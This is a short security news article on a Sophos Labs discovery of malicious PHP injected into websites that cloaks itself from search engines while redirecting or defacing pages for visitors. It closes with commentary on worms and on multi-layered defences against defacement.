Web defacement occurs when an intruder maliciously alters a Web page by inserting or substituting provocative and frequent offending data. The defacement of an organization’s site exposes visitors to misleading information until the malware system attack is discovered and rectified.

Fraser Howard and the security researchers of Sophos Labs have discovered a new technique of attack on the Web sites. Malicious infected PHP codes were inserted into the header elements (<IFRAME> elements) of the front pages of Web servers to determine the user activity such as what web pages the user is accessing through a search engine.

Well how it works?

Google and other search engines actively monitor the destination of their own links. When a user clicks a web link through a search engine for a Web site redirection, the malicious code abandons the redirection process. At this stage Hacker does some additional information gathering and presents the user the defaced page. The smart piece of malicious PHP coding also prevents search engine from detecting whether any defacement is going on or not.

“The incident raises some interesting questions,” said Howard. “Most notably the malicious content being injected into the Web pages was changing over time (sometimes a straight iframe, sometimes JavaScript). This is not what you necessarily expect for hacked sites; ordinarily, pages are injected with a fixed string (for example an iframe redirect or a script). Instead, the injected content may take one of many forms, sometimes triggering a variety of detections from anti-virus.”

Anti-Malware Measures Monitor

Search engines and Web servers use anti-malware monitor system to check the behavior of the web transactions. Google uses notification systems on its search engine to detect whether user’s connection is being intercepted. If user is infected with a malware, the search engine will display a large warning on top of the webpage.

Microsoft is working with FBI, Internet service providers, and software vendors to detect and warn about a specific malware and bring down spam and malware attacks to a minimal level.

HackANGLE

Web defacement is a significant and major threat to businesses developing an online presence. Website defacement and redirection are common for Anonymous and other outfits; but this is probably the work of an Internet malware worm that’s looking to infect websites and computers. Usually defacement is designed to show users something other than the page; a worm, however, wants to spread itself. Google and other search engines check for malware so hiding from them is the next step for worms.

Existing security products provide only a partial solution. In most cases, the solution isn’t satisfactory since the attack is exposed to external users and recovery takes significant time, effort, and costs.

Protection requires an effective, multi-layered solution that prevents Web defacement before altered pages are exposed to the public. The solution could be based on System call and API interception so it monitors the activities at the request level before any damage occurs such as Jiang publication on an analysis of rogue code codenamed Plankton, which detects malicious apps on the Android Market.